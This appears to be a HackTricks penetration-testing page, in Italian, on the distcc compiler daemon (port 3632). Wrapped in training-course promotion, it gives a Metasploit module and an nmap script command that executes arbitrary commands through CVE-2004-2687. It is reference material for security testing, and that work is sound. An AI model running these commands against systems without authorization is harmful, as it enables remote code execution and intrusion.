3.3 KiB
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Informazioni di base
Distcc è uno strumento che migliora il processo di compilazione utilizzando la potenza di elaborazione inattiva di altri computer nella rete. Quando distcc è configurato su una macchina, questa macchina è in grado di distribuire i suoi compiti di compilazione a un altro sistema. Questo sistema ricevente deve eseguire il demone distccd e deve avere un compilatore compatibile installato per elaborare il codice inviato.
Porta predefinita: 3632
PORT STATE SERVICE
3632/tcp open distccd
Exploitation
Controlla se è vulnerabile a CVE-2004-2687 per eseguire codice arbitrario:
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
Shodan
Non penso che shodan rilevi questo servizio.
Risorse
- https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
- https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
Post creato da Álex B (@r1p)
{% hint style="success" %}
Impara e pratica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos su github.